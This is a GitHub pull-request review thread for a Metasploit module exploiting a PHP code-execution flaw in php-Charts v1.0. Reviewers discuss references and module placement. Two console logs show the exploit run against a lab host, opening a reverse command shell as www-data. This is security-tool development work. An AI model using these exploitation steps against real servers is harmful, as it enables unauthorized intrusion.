Add php-Charts v1.0 PHP Code Execution Exploit #1341

Merged
merged 3 commits into from Jan 20, 2013

bcoles commented Jan 20, 2013

Add php-Charts v1.0 PHP Code Execution Vulnerability exploit module

],
'References' =>
[
['URL', 'http://www.exploit-db.com/exploits/24201/'],

jvazquez-r7 Jan 20, 2013

It's an EDB reference, not a URL.

jvazquez-r7 Jan 20, 2013

There is also an OSVDB reference for this vulnerability: http://www.osvdb.org/show/osvdb/89334. Could you please add the reference?

{
'ExitFunction' => "none"
},
'Platform' => 'unix',
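
Review bot: the 'ExitFunction' => "none" entry directly above 'Platform' => 'unix' looks unnecessary. Exit-function selection governs how native Windows payloads terminate, and a unix command payload does not use it. Suggest dropping the entry unless a target that needs it is added.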

jvazquez-r7 Jan 20, 2013

Seems like unix/webapps would be a better location than multi/http for this exploit. Could you please move it?

Or add more targets to really make it a "multi" platform exploit :)

jvazquez-r7 commented Jan 20, 2013

Tested successfully:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > check
[*] 192.168.1.154:80 - Sending check
[+] The target is vulnerable.
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sQkJsNt3VTXIrM6l;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sQkJsNt3VTXIrM6l\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46786) at 2013-01-20 17:11:45 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Once comments are fixed I think we'll be ready to merge it :-)

jvazquez-r7 merged commit dc318c5 into rapid7:master Jan 20, 2013

jvazquez-r7 commented Jan 20, 2013

Thanks,

Test after changes:

msf  exploit(php_charts_exec) > set rhost 192.168.1.154
rhost => 192.168.1.154
msf  exploit(php_charts_exec) > exploit
[*] 192.168.1.154:80 - Sending payload (702 bytes)
[*] Started reverse double handler
[*] Accepted the first client connection...
[+] 192.168.1.154:80 - Payload sent successfully
[*] Accepted the second client connection...
[*] Command: echo D0GYAZBZleRafqnB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "D0GYAZBZleRafqnB\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.154:46790) at 2013-01-20 17:36:30 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y
[*] 192.168.1.154 - Command shell session 1 closed.  Reason: User exit

Merged after updating references and disclosure date!
